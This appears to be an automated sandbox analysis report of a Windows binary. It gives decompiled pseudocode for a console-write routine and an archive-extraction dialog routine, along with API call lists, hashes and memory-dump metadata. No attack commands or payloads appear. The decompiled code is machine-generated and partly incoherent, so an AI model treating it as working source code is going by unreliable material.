                                                                            • Opcode ID: 30e179a6dc66c689a1fd46617328a1b6d78ba92d41e08dbdd840e91a0dbae18b
                                                                            • Instruction ID: f5c5e365fb45e77dc7ddabe1cf6ae496392925bf37709b04a4575e0deb716516
                                                                            • Opcode Fuzzy Hash: 30e179a6dc66c689a1fd46617328a1b6d78ba92d41e08dbdd840e91a0dbae18b
                                                                            • Instruction Fuzzy Hash: F64137B6408305AFC711DFA5C88096BFBE8FF88704F004A2EF6D692650E739E548CB56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E001BE2ED(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                            				signed int _v8;
                                                                            				signed char _v15;
                                                                            				char _v16;
                                                                            				void _v24;
                                                                            				short _v28;
                                                                            				char _v31;
                                                                            				void _v32;
                                                                            				long _v36;
                                                                            				intOrPtr _v40;
                                                                            				void* _v44;
                                                                            				signed int _v48;
                                                                            				signed char* _v52;
                                                                            				long _v56;
                                                                            				int _v60;
                                                                            				signed int _t78;
                                                                            				signed int _t80;
                                                                            				int _t86;
                                                                            				void* _t94;
                                                                            				long _t97;
                                                                            				void _t105;
                                                                            				void* _t112;
                                                                            				signed int _t116;
                                                                            				signed int _t118;
                                                                            				signed char _t123;
                                                                            				signed char _t128;
                                                                            				intOrPtr _t129;
                                                                            				signed int _t131;
                                                                            				signed char* _t133;
                                                                            				intOrPtr* _t135;
                                                                            				signed int _t136;
                                                                            				void* _t137;
                                                                            
                                                                            				_t78 =  *0x1cd668; // 0x44aa1787
                                                                            				_v8 = _t78 ^ _t136;
                                                                            				_t80 = _a8;
                                                                            				_t118 = _t80 >> 6;
                                                                            				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                            				_t133 = _a12;
                                                                            				_v52 = _t133;
                                                                            				_v48 = _t118;
                                                                            				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1f0420 + _t118 * 4)) + _t116 + 0x18));
                                                                            				_v40 = _a16 + _t133;
                                                                            				_t86 = GetConsoleCP();
                                                                            				_t135 = _a4;
                                                                            				_v60 = _t86;
                                                                            				 *_t135 = 0;
                                                                            				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                            				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                            				while(_t133 < _v40) {
                                                                            					_v28 = 0;
                                                                            					_v31 =  *_t133;
                                                                            					_t129 =  *((intOrPtr*)(0x1f0420 + _v48 * 4));
                                                                            					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                            					if((_t123 & 0x00000004) == 0) {
                                                                            						if(( *(E001B9474(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                            							_push(1);
                                                                            							_push(_t133);
                                                                            							goto L8;
                                                                            						} else {
                                                                            							if(_t133 >= _v40) {
                                                                            								_t131 = _v48;
                                                                            								 *((char*)( *((intOrPtr*)(0x1f0420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                            								 *( *((intOrPtr*)(0x1f0420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x1f0420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                            								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                            							} else {
                                                                            								_t112 = E001B804C( &_v28, _t133, 2);
                                                                            								_t137 = _t137 + 0xc;
                                                                            								if(_t112 != 0xffffffff) {
                                                                            									_t133 =  &(_t133[1]);
                                                                            									goto L9;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					} else {
                                                                            						_t128 = _t123 & 0x000000fb;
                                                                            						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                            						_push(2);
                                                                            						_v15 = _t128;
                                                                            						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                            						_push( &_v16);
                                                                            						L8:
                                                                            						_push( &_v28);
                                                                            						_t94 = E001B804C();
                                                                            						_t137 = _t137 + 0xc;
                                                                            						if(_t94 != 0xffffffff) {
                                                                            							L9:
                                                                            							_t133 =  &(_t133[1]);
                                                                            							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                            							_v56 = _t97;
                                                                            							if(_t97 != 0) {
                                                                            								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                            									L19:
                                                                            									 *_t135 = GetLastError();
                                                                            								} else {
                                                                            									_t48 = _t135 + 8; // 0xff76e900
                                                                            									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
                                                                            									if(_v36 >= _v56) {
                                                                            										if(_v31 != 0xa) {
                                                                            											goto L16;
                                                                            										} else {
                                                                            											_t105 = 0xd;
                                                                            											_v32 = _t105;
                                                                            											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                            												goto L19;
                                                                            											} else {
                                                                            												if(_v36 >= 1) {
                                                                            													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                            													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                            													goto L16;
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					goto L20;
                                                                            					L16:
                                                                            				}
                                                                            				L20:
                                                                            				return E001AE203(_t135, _v8 ^ _t136);
                                                                            			}

                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,001BEA62,00000000,00000000,00000000,00000000,00000000,001B3FBF), ref: 001BE32F
                                                                            • __fassign.LIBCMT ref: 001BE3AA
                                                                            • __fassign.LIBCMT ref: 001BE3C5
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 001BE3EB
                                                                            • WriteFile.KERNEL32(?,00000000,00000000,001BEA62,00000000,?,?,?,?,?,?,?,?,?,001BEA62,00000000), ref: 001BE40A
                                                                            • WriteFile.KERNEL32(?,00000000,00000001,001BEA62,00000000,?,?,?,?,?,?,?,?,?,001BEA62,00000000), ref: 001BE443
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                            • String ID:
                                                                            • API String ID: 1324828854-0
                                                                            • Opcode ID: 00848ef6076acc6b73c42d6f9220f815eddd4d443cfbabef1df603e57c648cb6
                                                                            • Instruction ID: 268fca0420d5a2302e2d5d627124018f16a782d8e8034d2932633c574df10fb4
                                                                            • Opcode Fuzzy Hash: 00848ef6076acc6b73c42d6f9220f815eddd4d443cfbabef1df603e57c648cb6
                                                                            • Instruction Fuzzy Hash: 7451A2B1E002499FDB14CFA8DC85AEEBBF9FF09310F14415AE955E7291E7709981CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 52%
                                                                            			E001ABB5B(intOrPtr __ebx, void* __ecx) {
                                                                            				intOrPtr _t209;
                                                                            				void* _t210;
                                                                            				intOrPtr _t263;
                                                                            				WCHAR* _t277;
                                                                            				void* _t279;
                                                                            				WCHAR* _t280;
                                                                            				void* _t285;
                                                                            
                                                                            				L0:
                                                                            				while(1) {
                                                                            					L0:
                                                                            					_t263 = __ebx;
                                                                            					if(__ebx != 1) {
                                                                            						goto L112;
                                                                            					}
                                                                            					L96:
                                                                            					__eax = __ebp - 0x7c84;
                                                                            					__edi = 0x800;
                                                                            					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
                                                                            					E0019AEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
                                                                            					__esi = 0;
                                                                            					_push(0);
                                                                            					while(1) {
                                                                            						L98:
                                                                            						_push( *0x1cd5f8);
                                                                            						__ebp - 0x7c84 = E00193E41(0x1d85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
                                                                            						__eax = E00199E6B(0x1d85fa);
                                                                            						__eflags = __al;
                                                                            						if(__al == 0) {
                                                                            							break;
                                                                            						}
                                                                            						L97:
                                                                            						__esi =  &(__esi->i);
                                                                            						__eflags = __esi;
                                                                            						_push(__esi);
                                                                            					}
                                                                            					L99:
                                                                            					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x1d85fa);
                                                                            					__eflags =  *(__ebp - 0x5c84);
                                                                            					if( *(__ebp - 0x5c84) == 0) {
                                                                            						while(1) {
                                                                            							L164:
                                                                            							_push(0x1000);
                                                                            							_t197 = _t285 - 0xe; // 0xffffa36e
                                                                            							_t198 = _t285 - 0xd; // 0xffffa36f
                                                                            							_t199 = _t285 - 0x5c84; // 0xffff46f8
                                                                            							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
                                                                            							_push( *((intOrPtr*)(_t285 + 0xc)));
                                                                            							_t209 = E001AA156();
                                                                            							_t263 =  *((intOrPtr*)(_t285 + 0x10));
                                                                            							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
                                                                            							if(_t209 != 0) {
                                                                            								_t210 = _t285 - 0x5c84;
                                                                            								_t279 = _t285 - 0x1bc8c;
                                                                            								_t277 = 6;
                                                                            								goto L2;
                                                                            							} else {
                                                                            								break;
                                                                            							}
                                                                            							L4:
                                                                            							while(E001A1410(_t285 - 0xfc8c,  *((intOrPtr*)(0x1cd618 + _t280 * 4))) != 0) {
                                                                            								_t280 =  &(_t280[0]);
                                                                            								if(_t280 < 0xe) {
                                                                            									continue;
                                                                            								} else {
                                                                            									goto L164;
                                                                            								}
                                                                            							}
                                                                            							__eflags = _t280 - 0xd;
                                                                            							if(__eflags > 0) {
                                                                            								continue;
                                                                            							}
                                                                            							L8:
                                                                            							switch( *((intOrPtr*)(_t280 * 4 +  &M001AC0D7))) {
                                                                            								case 0:
                                                                            									L9:
                                                                            									__eflags = _t263 - 2;
                                                                            									if(_t263 != 2) {
                                                                            										goto L164;
                                                                            									}
                                                                            									L10:
                                                                            									_t282 = 0x800;
                                                                            									E001A95F8(_t285 - 0x7c84, 0x800);
                                                                            									E0019A188(E0019B625(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
                                                                            									 *(_t285 - 4) = _t277;
                                                                            									E0019A2C2(_t285 - 0x8c8c, _t285 - 0xdc8c);
                                                                            									E00196EF9(_t285 - 0x3c84);
                                                                            									_push(_t277);
                                                                            									_t271 = _t285 - 0x8c8c;
                                                                            									_t224 = E0019A215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
                                                                            									__eflags = _t224;
                                                                            									if(_t224 == 0) {
                                                                            										L26:
                                                                            										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
                                                                            										E0019A19E(_t285 - 0x8c8c);
                                                                            										goto L164;
                                                                            									} else {
                                                                            										goto L13;
                                                                            										L14:
                                                                            										E0019B1B7(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
                                                                            										E0019AEA5(__eflags, _t285 - 0x103c, _t282);
                                                                            										_t284 = E001B2B33(_t285 - 0x7c84);
                                                                            										__eflags = _t284 - 4;
                                                                            										if(_t284 < 4) {
                                                                            											L16:
                                                                            											_t252 = E0019B5E5(_t285 - 0x5c84);
                                                                            											__eflags = _t252;
                                                                            											if(_t252 != 0) {
                                                                            												goto L26;
                                                                            											}
                                                                            											L17:
                                                                            											_t254 = E001B2B33(_t285 - 0x3c84);
                                                                            											__eflags = 0;
                                                                            											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
                                                                            											E001AE920(_t277, _t285 - 0x3c, _t277, 0x1e);
                                                                            											_t287 = _t287 + 0x10;
                                                                            											 *((intOrPtr*)(_t285 - 0x38)) = 3;
                                                                            											_push(0x14);
                                                                            											_pop(_t257);
                                                                            											 *((short*)(_t285 - 0x2c)) = _t257;
                                                                            											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
                                                                            											_push(_t285 - 0x3c);
                                                                            											 *0x1cdef4();
                                                                            											goto L18;
                                                                            										}
                                                                            										L15:
                                                                            										_t262 = E001B2B33(_t285 - 0x103c);
                                                                            										__eflags = _t284 - _t262;
                                                                            										if(_t284 > _t262) {
                                                                            											goto L17;
                                                                            										}
                                                                            										goto L16;
                                                                            										L18:
                                                                            										_t229 = GetFileAttributesW(_t285 - 0x3c84);
                                                                            										__eflags = _t229 - 0xffffffff;
                                                                            										if(_t229 == 0xffffffff) {
                                                                            											L25:
                                                                            											_push(_t277);
                                                                            											_t271 = _t285 - 0x8c8c;
                                                                            											_t231 = E0019A215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
                                                                            											__eflags = _t231;
                                                                            											if(_t231 != 0) {
                                                                            												_t282 = 0x800;
                                                                            												L13:
                                                                            												SetFileAttributesW(_t285 - 0x3c84, _t277);
                                                                            												__eflags =  *((char*)(_t285 - 0x2c78));
                                                                            												if(__eflags == 0) {
                                                                            													goto L18;
                                                                            												}
                                                                            												goto L14;
                                                                            											}
                                                                            											goto L26;
                                                                            										}
                                                                            										L19:
                                                                            										_t233 = DeleteFileW(_t285 - 0x3c84);
                                                                            										__eflags = _t233;
                                                                            										if(_t233 != 0) {
                                                                            											goto L25;
                                                                            										} else {
                                                                            											_t283 = _t277;
                                                                            											_push(_t277);
                                                                            											goto L22;
                                                                            											L22:
                                                                            											E00193E41(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
                                                                            											_t287 = _t287 + 0x14;
                                                                            											_t238 = GetFileAttributesW(_t285 - 0x103c);
                                                                            											__eflags = _t238 - 0xffffffff;
                                                                            											if(_t238 != 0xffffffff) {
                                                                            												_t283 = _t283 + 1;
                                                                            												__eflags = _t283;
                                                                            												_push(_t283);
                                                                            												goto L22;
                                                                            											} else {
                                                                            												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
                                                                            												__eflags = _t241;
                                                                            												if(_t241 != 0) {
                                                                            													MoveFileExW(_t285 - 0x103c, _t277, 4);
                                                                            												}
                                                                            												goto L25;
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								case 1:
                                                                            									L27:
                                                                            									__eflags = __ebx;
                                                                            									if(__ebx == 0) {
                                                                            										__eax =  *0x1ece0c;
                                                                            										__eflags =  *0x1ece0c;
                                                                            										__ebx = __ebx & 0xffffff00 |  *0x1ece0c == 0x00000000;
                                                                            										__eflags = __bl;
                                                                            										if(__bl == 0) {
                                                                            											__eax =  *0x1ece0c;
                                                                            											_pop(__ecx);
                                                                            											_pop(__ecx);
                                                                            										}
                                                                            										L30:
                                                                            										__bh =  *((intOrPtr*)(__ebp - 0xd));
                                                                            										__eflags = __bh;
                                                                            										if(__eflags == 0) {
                                                                            											__eax = __ebp + 0xc;
                                                                            											_push(__ebp + 0xc);
                                                                            											__esi = E001AA2AE(__ecx, __edx, __eflags);
                                                                            											__eax =  *0x1ece0c;
                                                                            										} else {
                                                                            											__esi = __ebp - 0x5c84;
                                                                            										}
                                                                            										__eflags = __bl;
                                                                            										if(__bl == 0) {
                                                                            											__edi = __eax;
                                                                            										}
                                                                            										L35:
                                                                            										__eax = E001B2B33(__esi);
                                                                            										__eax = __eax + __edi;
                                                                            										_push(__eax);
                                                                            										_push( *0x1ece0c);
                                                                            										__eax = E001B2B5E(__ecx, __edx);
                                                                            										__esp = __esp + 0xc;
                                                                            										__eflags = __eax;
                                                                            										if(__eax != 0) {
                                                                            											 *0x1ece0c = __eax;
                                                                            											__eflags = __bl;
                                                                            											if(__bl != 0) {
                                                                            												__ecx = 0;
                                                                            												__eflags = 0;
                                                                            												 *__eax = __cx;
                                                                            											}
                                                                            											__eax = E001B66ED(__eax, __esi);
                                                                            											_pop(__ecx);
                                                                            											_pop(__ecx);
                                                                            										}
                                                                            										__eflags = __bh;
                                                                            										if(__bh == 0) {
                                                                            											__eax = L001B2B4E(__esi);
                                                                            										}
                                                                            									}
                                                                            									goto L164;
                                                                            								case 2:
                                                                            									L41:
                                                                            									__eflags = __ebx;
                                                                            									if(__ebx == 0) {
                                                                            										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
                                                                            									}
                                                                            									goto L164;
                                                                            								case 3:
                                                                            									L43:
                                                                            									__eflags = __ebx;
                                                                            									if(__ebx != 0) {
                                                                            										goto L164;
                                                                            									}
                                                                            									L44:
                                                                            									__eflags =  *0x1d9602 - __di;
                                                                            									if( *0x1d9602 != __di) {
                                                                            										goto L164;
                                                                            									}
                                                                            									L45:
                                                                            									__eax = 0;
                                                                            									__edi = __ebp - 0x5c84;
                                                                            									_push(0x22);
                                                                            									 *(__ebp - 0x103c) = __ax;
                                                                            									_pop(__eax);
                                                                            									__eflags =  *(__ebp - 0x5c84) - __ax;
                                                                            									if( *(__ebp - 0x5c84) == __ax) {
                                                                            										__edi = __ebp - 0x5c82;
                                                                            									}
                                                                            									__eax = E001B2B33(__edi);
                                                                            									__esi = 0x800;
                                                                            									__eflags = __eax - 0x800;
                                                                            									if(__eax >= 0x800) {
                                                                            										goto L164;
                                                                            									} else {
                                                                            										L48:
                                                                            										__eax =  *__edi & 0x0000ffff;
                                                                            										_push(0x5c);
                                                                            										_pop(__ecx);
                                                                            										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
                                                                            										if(( *__edi & 0x0000ffff) != 0x2e) {
                                                                            											L52:
                                                                            											__eflags = __ax - __cx;
                                                                            											if(__ax == __cx) {
                                                                            												L64:
                                                                            												__ebp - 0x103c = E0019FAB1(__ebp - 0x103c, __edi, __esi);
                                                                            												__ebx = 0;
                                                                            												__eflags = 0;
                                                                            												L65:
                                                                            												_push(0x22);
                                                                            												_pop(__eax);
                                                                            												__eax = __ebp - 0x103c;
                                                                            												__eax = E001B0D9B(__ebp - 0x103c, __ebp - 0x103c);
                                                                            												_pop(__ecx);
                                                                            												_pop(__ecx);
                                                                            												__eflags = __eax;
                                                                            												if(__eax != 0) {
                                                                            													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
                                                                            													if( *((intOrPtr*)(__eax + 2)) == __bx) {
                                                                            														__ecx = 0;
                                                                            														__eflags = 0;
                                                                            														 *__eax = __cx;
                                                                            													}
                                                                            												}
                                                                            												__eax = __ebp - 0x103c;
                                                                            												__edi = 0x1d9602;
                                                                            												E0019FAB1(0x1d9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
                                                                            												__eax = E001A9FFC(__ebp - 0x103c, __esi);
                                                                            												__esi = GetDlgItem( *(__ebp + 8), 0x66);
                                                                            												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
                                                                            												__ebx =  *0x1cdf7c;
                                                                            												__eax = SendMessageW(__esi, 0x143, __ebx, 0x1d9602); // executed
                                                                            												__eax = __ebp - 0x103c;
                                                                            												__eax = E001B2B69(__ebp - 0x103c, 0x1d9602, __eax);
                                                                            												_pop(__ecx);
                                                                            												_pop(__ecx);
                                                                            												__eflags = __eax;
                                                                            												if(__eax != 0) {
                                                                            													__ebp - 0x103c = 0;
                                                                            													__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
                                                                            												}
                                                                            												goto L164;
                                                                            											}
                                                                            											L53:
                                                                            											__eflags = __ax;
                                                                            											if(__ax == 0) {
                                                                            												L55:
                                                                            												__eax = __ebp - 0x18;
                                                                            												__ebx = 0;
                                                                            												_push(__ebp - 0x18);
                                                                            												_push(1);
                                                                            												_push(0);
                                                                            												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
                                                                            												_push(0x80000002);
                                                                            												__eax =  *0x1cdea8();
                                                                            												__eflags = __eax;
                                                                            												if(__eax == 0) {
                                                                            													__eax = __ebp - 0x14;
                                                                            													 *(__ebp - 0x14) = 0x1000;
                                                                            													_push(__ebp - 0x14);
                                                                            													__eax = __ebp - 0x103c;
                                                                            													_push(__ebp - 0x103c);
                                                                            													__eax = __ebp - 0x1c;
                                                                            													_push(__ebp - 0x1c);
                                                                            													_push(0);
                                                                            													_push(L"ProgramFilesDir");
                                                                            													_push( *(__ebp - 0x18));
                                                                            													__eax =  *0x1cdea4();
                                                                            													_push( *(__ebp - 0x18));
                                                                            													 *0x1cde84() =  *(__ebp - 0x14);
                                                                            													__ecx = 0x7ff;
                                                                            													__eax =  *(__ebp - 0x14) >> 1;
                                                                            													__eflags = __eax - 0x7ff;
                                                                            													if(__eax >= 0x7ff) {
                                                                            														__eax = 0x7ff;
                                                                            													}
                                                                            													__ecx = 0;
                                                                            													__eflags = 0;
                                                                            													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
                                                                            												}
                                                                            												__eflags =  *(__ebp - 0x103c) - __bx;
                                                                            												if( *(__ebp - 0x103c) != __bx) {
                                                                            													__eax = __ebp - 0x103c;
                                                                            													__eax = E001B2B33(__ebp - 0x103c);
                                                                            													_push(0x5c);
                                                                            													_pop(__ecx);
                                                                            													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
                                                                            													if(__eflags != 0) {
                                                                            														__ebp - 0x103c = E0019FA89(__eflags, __ebp - 0x103c, "\\", __esi);
                                                                            													}
                                                                            												}
                                                                            												__esi = E001B2B33(__edi);
                                                                            												__eax = __ebp - 0x103c;
                                                                            												__eflags = __esi - 0x7ff;
                                                                            												__esi = 0x800;
                                                                            												if(__eflags < 0) {
                                                                            													__ebp - 0x103c = E0019FA89(__eflags, __ebp - 0x103c, __edi, 0x800);
                                                                            												}
                                                                            												goto L65;
                                                                            											}
                                                                            											L54:
                                                                            											__eflags =  *((short*)(__edi + 2)) - 0x3a;
                                                                            											if( *((short*)(__edi + 2)) == 0x3a) {
                                                                            												goto L64;
                                                                            											}
                                                                            											goto L55;
                                                                            										}
                                                                            										L49:
                                                                            										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
                                                                            										if( *((intOrPtr*)(__edi + 2)) != __cx) {
                                                                            											goto L52;
                                                                            										}
                                                                            										L50:
                                                                            										__edi = __edi + 4;
                                                                            										__ebx = 0;
                                                                            										__eflags =  *__edi - __bx;
                                                                            										if( *__edi == __bx) {
                                                                            											goto L164;
                                                                            										}
                                                                            										L51:
                                                                            										__ebp - 0x103c = E0019FAB1(__ebp - 0x103c, __edi, 0x800);
                                                                            										goto L65;
                                                                            									}
                                                                            								case 4:
                                                                            									L70:
                                                                            									__eflags =  *0x1d95fc - 1;
                                                                            									__eflags = __eax - 0x1d95fc;
                                                                            									 *__edi =  *__edi + __ecx;
                                                                            									__eflags =  *(__ebx + 6) & __bl;
                                                                            									 *__eax =  *__eax + __al;
                                                                            									__eflags =  *__eax;
                                                                            								case 5:
                                                                            									L75:
                                                                            									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                                                                            									__ecx = 0;
                                                                            									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
                                                                            									__eflags = __eax;
                                                                            									if(__eax == 0) {
                                                                            										L82:
                                                                            										 *0x1d75d2 = __cl;
                                                                            										 *0x1d75d3 = 1;
                                                                            										goto L164;
                                                                            									}
                                                                            									L76:
                                                                            									__eax = __eax - 0x30;
                                                                            									__eflags = __eax;
                                                                            									if(__eax == 0) {
                                                                            										L80:
                                                                            										 *0x1d75d2 = __cl;
                                                                            										L81:
                                                                            										 *0x1d75d3 = __cl;
                                                                            										goto L164;
                                                                            									}
                                                                            									L77:
                                                                            									__eax = __eax - 1;
                                                                            									__eflags = __eax;
                                                                            									if(__eax == 0) {
                                                                            										goto L82;
                                                                            									}
                                                                            									L78:
                                                                            									__eax = __eax - 1;
                                                                            									__eflags = __eax;
                                                                            									if(__eax != 0) {
                                                                            										goto L164;
                                                                            									}
                                                                            									L79:
                                                                            									 *0x1d75d2 = 1;
                                                                            									goto L81;
                                                                            								case 6:
                                                                            									L88:
                                                                            									__eflags = __ebx - 4;
                                                                            									if(__ebx != 4) {
                                                                            										goto L92;
                                                                            									}
                                                                            									L89:
                                                                            									__eax = __ebp - 0x5c84;
                                                                            									__eax = E001B2B69(__ebp - 0x5c84, __eax, L"<>");
                                                                            									_pop(__ecx);
                                                                            									_pop(__ecx);
                                                                            									__eflags = __eax;
                                                                            									if(__eax == 0) {
                                                                            										goto L92;
                                                                            									}
                                                                            									L90:
                                                                            									_push(__edi);
                                                                            									goto L91;
                                                                            								case 7:
                                                                            									goto L0;
                                                                            								case 8:
                                                                            									L116:
                                                                            									__eflags = __ebx - 3;
                                                                            									if(__ebx == 3) {
                                                                            										__eflags =  *(__ebp - 0x5c84) - __di;
                                                                            										if(__eflags != 0) {
                                                                            											__eax = __ebp - 0x5c84;
                                                                            											_push(__ebp - 0x5c84);
                                                                            											__eax = E001B668C(__ebx, __edi);
                                                                            											_pop(__ecx);
                                                                            											 *0x1ede1c = __eax;
                                                                            										}
                                                                            										__eax = __ebp + 0xc;
                                                                            										_push(__ebp + 0xc);
                                                                            										 *0x1ede18 = E001AA2AE(__ecx, __edx, __eflags);
                                                                            									}
                                                                            									 *0x1e5d03 = 1;
                                                                            									goto L164;
                                                                            								case 9:
                                                                            									L121:
                                                                            									__eflags = __ebx - 5;
                                                                            									if(__ebx != 5) {
                                                                            										L92:
                                                                            										 *0x1ede20 = 1;
                                                                            										goto L164;
                                                                            									}
                                                                            									L122:
                                                                            									_push(1);
                                                                            									L91:
                                                                            									__eax = __ebp - 0x5c84;
                                                                            									_push(__ebp - 0x5c84);
                                                                            									_push( *(__ebp + 8));
                                                                            									__eax = E001AC431();
                                                                            									goto L92;
                                                                            								case 0xa:
                                                                            									L123:
                                                                            									__eflags = __ebx - 6;
                                                                            									if(__ebx != 6) {
                                                                            										goto L164;
                                                                            									}
                                                                            									L124:
                                                                            									__eax = 0;
                                                                            									 *(__ebp - 0x2c3c) = __ax;
                                                                            									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
                                                                            									__eax = E001B59C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
                                                                            									_push(0x800);
                                                                            									__eflags = __eax - 0x50;
                                                                            									if(__eax == 0x50) {
                                                                            										_push(0x1ead0a);
                                                                            										__eax = __ebp - 0x2c3c;
                                                                            										_push(__ebp - 0x2c3c);
                                                                            										__eax = E0019FAB1();
                                                                            										 *(__ebp - 0x14) = 2;
                                                                            									} else {
                                                                            										__eflags = __eax - 0x54;
                                                                            										__eax = __ebp - 0x2c3c;
                                                                            										if(__eflags == 0) {
                                                                            											_push(0x1e9d0a);
                                                                            											_push(__eax);
                                                                            											__eax = E0019FAB1();
                                                                            											 *(__ebp - 0x14) = 7;
                                                                            										} else {
                                                                            											_push(0x1ebd0a);
                                                                            											_push(__eax);
                                                                            											__eax = E0019FAB1();
                                                                            											 *(__ebp - 0x14) = 0x10;
                                                                            										}
                                                                            									}
                                                                            									__eax = 0;
                                                                            									 *(__ebp - 0x9c8c) = __ax;
                                                                            									 *(__ebp - 0x1c3c) = __ax;
                                                                            									__ebp - 0x19c8c = __ebp - 0x6c84;
                                                                            									__eax = E001B4D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
                                                                            									_pop(__ecx);
                                                                            									_pop(__ecx);
                                                                            									_push(0x22);
                                                                            									_pop(__ebx);
                                                                            									__eflags =  *(__ebp - 0x6c84) - __bx;
                                                                            									if( *(__ebp - 0x6c84) != __bx) {
                                                                            										L132:
                                                                            										__ebp - 0x6c84 = E00199E6B(__ebp - 0x6c84);
                                                                            										__eflags = __al;
                                                                            										if(__al != 0) {
                                                                            											goto L149;
                                                                            										}
                                                                            										L133:
                                                                            										__ebx = __edi;
                                                                            										__esi = __ebp - 0x6c84;
                                                                            										__eflags =  *(__ebp - 0x6c84) - __bx;
                                                                            										if( *(__ebp - 0x6c84) == __bx) {
                                                                            											goto L149;
                                                                            										}
                                                                            										L134:
                                                                            										_push(0x20);
                                                                            										_pop(__ecx);
                                                                            										do {
                                                                            											L135:
                                                                            											__eax = __esi->i & 0x0000ffff;
                                                                            											__eflags = __ax - __cx;
                                                                            											if(__ax == __cx) {
                                                                            												L137:
                                                                            												__edi = __eax;
                                                                            												__eax = 0;
                                                                            												__esi->i = __ax;
                                                                            												__ebp - 0x6c84 = E00199E6B(__ebp - 0x6c84);
                                                                            												__eflags = __al;
                                                                            												if(__al == 0) {
                                                                            													L144:
                                                                            													__esi->i = __di;
                                                                            													L145:
                                                                            													_push(0x20);
                                                                            													_pop(__ecx);
                                                                            													__edi = 0;
                                                                            													__eflags = 0;
                                                                            													goto L146;
                                                                            												}
                                                                            												L138:
                                                                            												_push(0x2f);
                                                                            												_pop(__eax);
                                                                            												__ebx = __esi;
                                                                            												__eflags = __di - __ax;
                                                                            												if(__di != __ax) {
                                                                            													L140:
                                                                            													_push(0x20);
                                                                            													_pop(__eax);
                                                                            													do {
                                                                            														L141:
                                                                            														__esi =  &(__esi->i);
                                                                            														__eflags = __esi->i - __ax;
                                                                            													} while (__esi->i == __ax);
                                                                            													_push(__esi);
                                                                            													__eax = __ebp - 0x1c3c;
                                                                            													L143:
                                                                            													_push(__eax);
                                                                            													__eax = E001B4D7E();
